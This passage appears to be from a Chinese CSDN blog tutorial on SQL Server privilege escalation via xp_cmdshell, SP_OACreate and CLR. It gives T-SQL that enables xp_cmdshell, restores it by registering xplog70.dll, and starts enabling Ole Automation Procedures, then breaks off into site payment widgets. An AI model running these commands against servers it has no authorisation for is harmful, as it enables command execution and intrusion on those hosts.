SQL Server提权系列

本文详细介绍了三种SQL Server提权技术:利用xp_cmdshell、SP_OACreate和SQL Server CLR。xp_cmdshell需要先开启,若被删除可通过上传dll恢复。SP_OACreate结合特定命令可实现提权。SQL Server CLR集成允许使用.NET Framework语言编写存储过程等,但需设置为UNSAFE权限级别,并通过DLL或文件十六进制流创建。提权过程涉及创建和执行CLR存储过程。
摘要由CSDN通过智能技术生成

一、利用xp_cmdshell提权#

xp_cmdshell默认是关闭的,可以通过下面的命令打开

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

二、利用SP_OACreate提权#

首先执行如下命令

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值